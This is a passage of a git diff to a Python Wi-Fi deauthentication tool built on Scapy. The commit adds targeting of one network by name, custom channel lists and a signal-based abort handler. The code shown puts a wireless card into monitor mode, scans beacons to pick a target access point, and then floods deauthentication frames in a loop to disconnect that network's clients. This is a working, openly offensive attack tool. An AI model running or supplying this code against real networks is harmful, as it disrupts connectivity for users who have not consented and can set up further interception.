1
1
#!/usr/bin/env python3
2
2
3
3
import copy
4
+ import signal
4
5
import logging
5
6
import argparse
6
7
import traceback
28
29
29
30
30
31
class Interceptor :
31
- def __init__ (self , net_iface , skip_monitor_mode_setup , kill_networkmanager ):
32
+ _ABORT = False
33
+
34
+ def __init__ (self , net_iface , skip_monitor_mode_setup , kill_networkmanager , bssid_name , custom_channels ):
32
35
self .interface = net_iface
33
36
self ._channel_sniff_timeout = 2
34
37
self ._scan_intv = 0.1
35
38
self ._deauth_intv = 0.1
36
39
self ._printf_res_intv = 1
37
40
self ._ssid_str_pad = 42 # total len 80
38
41
39
- self ._abort = False
40
42
self ._current_channel_num = None
41
43
self ._current_channel_aps = set ()
42
44
@@ -61,6 +63,37 @@ def __init__(self, net_iface, skip_monitor_mode_setup, kill_networkmanager):
61
63
self ._channel_range = {channel : defaultdict (dict ) for channel in self ._get_channels ()}
62
64
self ._all_ssids : Dict [BandType , Dict [str , SSID ]] = {band : dict () for band in BandType }
63
65
66
+ self ._custom_bssid_name : Union [str , None ] = self .parse_custom_bssid_name (bssid_name )
67
+ self ._custom_bssid_channels : List [int ] = self .parse_custom_channels (custom_channels )
68
+ self ._custom_bssid_last_ch = 0 # to avoid overlapping
69
+
70
+ @staticmethod
71
+ def parse_custom_bssid_name (bssid_name : Union [None , str ]) -> Union [None , str ]:
72
+ if bssid_name is not None :
73
+ bssid_name = str (bssid_name )
74
+ if len (bssid_name ) == 0 :
75
+ print_error (f"Custom BSSID name cannot be an empty string" )
76
+ raise Exception ("Invalid BSSID name" )
77
+ return bssid_name
78
+
79
+ def parse_custom_channels (self , channel_list : Union [None , str ]):
80
+ ch_list = list ()
81
+ if channel_list is not None :
82
+ try :
83
+ ch_list = [int (ch ) for ch in channel_list .split (',' )]
84
+ except Exception as exc :
85
+ print_error (f"Invalid custom channel input -> { channel_list } " )
86
+ raise Exception ("Bad custom channel input" )
87
+
88
+ if len (ch_list ):
89
+ supported_channels = self ._channel_range .keys ()
90
+ for ch in ch_list :
91
+ if ch not in supported_channels :
92
+ print_error (f"Custom channel { ch } is not supported by the network interface"
93
+ f" { list (supported_channels )} " )
94
+ raise Exception ("Unsupported channel" )
95
+ return ch_list
96
+
64
97
def _enable_monitor_mode (self ):
65
98
for cmd in [f"sudo ip link set { self .interface } down" ,
66
99
f"sudo iw { self .interface } set monitor control" ,
@@ -90,35 +123,54 @@ def _ap_sniff_cb(self, pkt):
90
123
if pkt .haslayer (Dot11Beacon ) or pkt .haslayer (Dot11ProbeResp ):
91
124
ap_mac = str (pkt .addr3 )
92
125
ssid = pkt [Dot11Elt ].info .strip (b'\x00 ' ).decode ('utf-8' ).strip () or ap_mac
93
- if ap_mac == BD_MACADDR or not ssid :
126
+ if ap_mac == BD_MACADDR or not ssid or (self ._custom_bssid_name_is_set ()
127
+ and ssid != self ._custom_bssid_name ):
94
128
return
95
129
pkt_ch = frequency_to_channel (pkt [RadioTap ].Channel )
96
130
band_type = BandType .T_50GHZ if pkt_ch > 14 else BandType .T_24GHZ
97
131
if ssid not in self ._all_ssids [band_type ]:
98
132
self ._all_ssids [band_type ][ssid ] = SSID (ssid , ap_mac , band_type )
99
133
self ._all_ssids [band_type ][ssid ].add_channel (pkt_ch if pkt_ch in self ._channel_range else self ._current_channel_num )
134
+ if self ._custom_bssid_name_is_set ():
135
+ self ._custom_bssid_last_ch = self ._all_ssids [band_type ][ssid ].channel
100
136
else :
101
137
self ._clients_sniff_cb (pkt ) # pass forward to find potential clients
102
138
except Exception as exc :
103
139
pass
104
140
105
141
def _scan_channels_for_aps (self ):
142
+ channels_to_scan = self ._custom_bssid_channels or self ._channel_range
143
+ print_info (f"Starting AP scan, please wait... ({ len (channels_to_scan )} channels total)" )
144
+ if self ._custom_bssid_name_is_set ():
145
+ print_info (f"Scanning for target BSSID -> { self ._custom_bssid_name } " )
146
+
106
147
try :
107
- for idx , ch_num in enumerate (self ._channel_range ):
148
+ for idx , ch_num in enumerate (channels_to_scan ):
149
+ if self ._custom_bssid_name_is_set () and self ._found_custom_bssid_name () \
150
+ and self ._current_channel_num - self ._custom_bssid_last_ch > 2 :
151
+ # make sure sniffing doesn't stop on an overlapped channel for custom BSSIDs
152
+ return
108
153
self ._set_channel (ch_num )
109
154
print_info (f"Scanning channel { self ._current_channel_num } (left -> "
110
- f"{ len (self ._channel_range ) - (idx + 1 )} )" , end = "\r " )
111
- sniff (prn = self ._ap_sniff_cb , iface = self .interface , timeout = self ._channel_sniff_timeout )
112
- except KeyboardInterrupt :
113
- self .user_abort ()
155
+ f"{ len (channels_to_scan ) - (idx + 1 )} )" , end = "\r " )
156
+ sniff (prn = self ._ap_sniff_cb , iface = self .interface , timeout = self ._channel_sniff_timeout ,
157
+ stop_filter = lambda p : Interceptor ._ABORT is True )
114
158
finally :
115
159
printf ("" )
116
160
117
- def _start_initial_ap_scan (self ) -> SSID :
118
- print_info (f"Starting AP scan, please wait... ({ len (self ._channel_range )} channels total)" )
161
+ def _found_custom_bssid_name (self ):
162
+ for all_channel_aps in self ._all_ssids .values ():
163
+ for ssid_name in all_channel_aps .keys ():
164
+ if ssid_name == self ._custom_bssid_name :
165
+ return True
166
+ return False
119
167
168
+ def _custom_bssid_name_is_set (self ):
169
+ return self ._custom_bssid_name is not None
170
+
171
+ def _start_initial_ap_scan (self ) -> SSID :
120
172
self ._scan_channels_for_aps ()
121
- for _ , band_ssids in self ._all_ssids .items ():
173
+ for band_ssids in self ._all_ssids .values ():
122
174
for ssid_name , ssid_obj in band_ssids .items ():
123
175
self ._channel_range [ssid_obj .channel ][ssid_name ] = copy .deepcopy (ssid_obj )
124
176
@@ -138,10 +190,11 @@ def _start_initial_ap_scan(self) -> SSID:
138
190
printf (f"{ pref } { self ._generate_ssid_str (ssid_obj .name , ssid_obj .channel , ssid_obj .mac_addr , preflen )} " )
139
191
if not target_map :
140
192
print_error ("Not APs were found, quitting..." )
141
- self . _abort = True
193
+ Interceptor . _ABORT = True
142
194
exit (0 )
143
195
144
196
printf (DELIM )
197
+
145
198
chosen = - 1
146
199
while chosen not in target_map .keys ():
147
200
user_input = print_input (f"Choose a target from { min (target_map .keys ())} to { max (target_map .keys ())} :" )
@@ -174,7 +227,7 @@ def _packet_confirms_client(pkt):
174
227
175
228
def _listen_for_clients (self ):
176
229
print_info (f"Setting up a listener for new clients..." )
177
- sniff (prn = self ._clients_sniff_cb , iface = self .interface , stop_filter = lambda p : self . _abort is True )
230
+ sniff (prn = self ._clients_sniff_cb , iface = self .interface , stop_filter = lambda p : Interceptor . _ABORT is True )
178
231
179
232
def _run_deauther (self ):
180
233
try :
@@ -184,7 +237,7 @@ def _run_deauther(self):
184
237
185
238
rd_frm = RadioTap ()
186
239
deauth_frm = Dot11Deauth (reason = 7 )
187
- while not self . _abort :
240
+ while not Interceptor . _ABORT :
188
241
self .attack_loop_count += 1
189
242
sendp (rd_frm /
190
243
Dot11 (addr1 = BD_MACADDR , addr2 = ap_mac , addr3 = ap_mac ) /
@@ -202,7 +255,7 @@ def _run_deauther(self):
202
255
sleep (self ._deauth_intv )
203
256
except Exception as exc :
204
257
print_error (f"Exception in deauth-loop -> { traceback .format_exc ()} " )
205
- self . _abort = True
258
+ Interceptor . _ABORT = True
206
259
exit (0 )
207
260
208
261
def run (self ):
@@ -217,29 +270,29 @@ def run(self):
217
270
t .start ()
218
271
219
272
printf (f"{ DELIM } \n " )
220
- try :
221
- start = get_time ()
222
- while not self ._abort :
223
- print_info (f"Target SSID{ self .target_ssid .name .rjust (80 - 15 , ' ' )} " )
224
- print_info (f"Channel{ str (ssid_ch ).rjust (80 - 11 , ' ' )} " )
225
- print_info (f"MAC addr{ self .target_ssid .mac_addr .rjust (80 - 12 , ' ' )} " )
226
- print_info (f"Net interface{ self .interface .rjust (80 - 17 , ' ' )} " )
227
- print_info (f"Confirmed clients{ BOLD } { str (len (self .target_ssid .clients )).rjust (80 - 21 , ' ' )} { RESET } " )
228
- print_info (f"Elapsed sec { BOLD } { str (get_time () - start ).rjust (80 - 16 , ' ' )} { RESET } " )
229
- sleep (self ._printf_res_intv )
230
- clear_line (7 )
231
- except KeyboardInterrupt :
232
- print ("" )
233
- self .user_abort ()
234
-
235
- def user_abort (self ):
236
- self ._abort = True
237
- printf (f"{ DELIM } " )
238
- print_error (f"User asked to stop, quitting..." )
239
- exit (0 )
273
+ start = get_time ()
274
+ while not Interceptor ._ABORT :
275
+ print_info (f"Target SSID{ self .target_ssid .name .rjust (80 - 15 , ' ' )} " )
276
+ print_info (f"Channel{ str (ssid_ch ).rjust (80 - 11 , ' ' )} " )
277
+ print_info (f"MAC addr{ self .target_ssid .mac_addr .rjust (80 - 12 , ' ' )} " )
278
+ print_info (f"Net interface{ self .interface .rjust (80 - 17 , ' ' )} " )
279
+ print_info (f"Confirmed clients{ BOLD } { str (len (self .target_ssid .clients )).rjust (80 - 21 , ' ' )} { RESET } " )
280
+ print_info (f"Elapsed sec { BOLD } { str (get_time () - start ).rjust (80 - 16 , ' ' )} { RESET } " )
281
+ sleep (self ._printf_res_intv )
282
+ clear_line (7 )
283
+
284
+ @staticmethod
285
+ def user_abort (* args ):
286
+ if not Interceptor ._ABORT :
287
+ Interceptor ._ABORT = True
288
+ printf (f"{ DELIM } " )
289
+ print_error (f"User asked to stop, quitting..." )
290
+ exit (0 )
240
291
241
292
242
293
if __name__ == "__main__" :
294
+ signal .signal (signal .SIGINT , Interceptor .user_abort )
295
+
243
296
printf (f"\n { BANNER } \n "
244
297
f"Make sure of the following:\n "
245
298
f"1. You are running as { BOLD } root{ RESET } \n "
@@ -261,10 +314,16 @@ def user_abort(self):
261
314
default = False , dest = "skip_monitormode" , required = False )
262
315
parser .add_argument ('-k' , '--kill' , help = 'kill NetworkManager (might interfere with the process)' ,
263
316
action = 'store_true' , default = False , dest = "kill_networkmanager" , required = False )
317
+ parser .add_argument ('-b' , '--bssid' , help = 'custom BSSID name (case-sensitive)' , metavar = "bssid_name" ,
318
+ action = 'store' , default = None , dest = "custom_bssid" , required = False )
319
+ parser .add_argument ('-c' , '--channels' , help = 'custom channels to scan, separated by a comma (i.e -> 1,3,4)' ,
320
+ metavar = "ch1,ch2" , action = 'store' , default = None , dest = "custom_channels" , required = False )
264
321
pargs = parser .parse_args ()
265
322
266
323
invalidate_print () # after arg parsing
267
324
attacker = Interceptor (net_iface = pargs .net_iface ,
268
325
skip_monitor_mode_setup = pargs .skip_monitormode ,
269
- kill_networkmanager = pargs .kill_networkmanager )
326
+ kill_networkmanager = pargs .kill_networkmanager ,
327
+ bssid_name = pargs .custom_bssid ,
328
+ custom_channels = pargs .custom_channels )
270
329
attacker .run ()
0 commit comments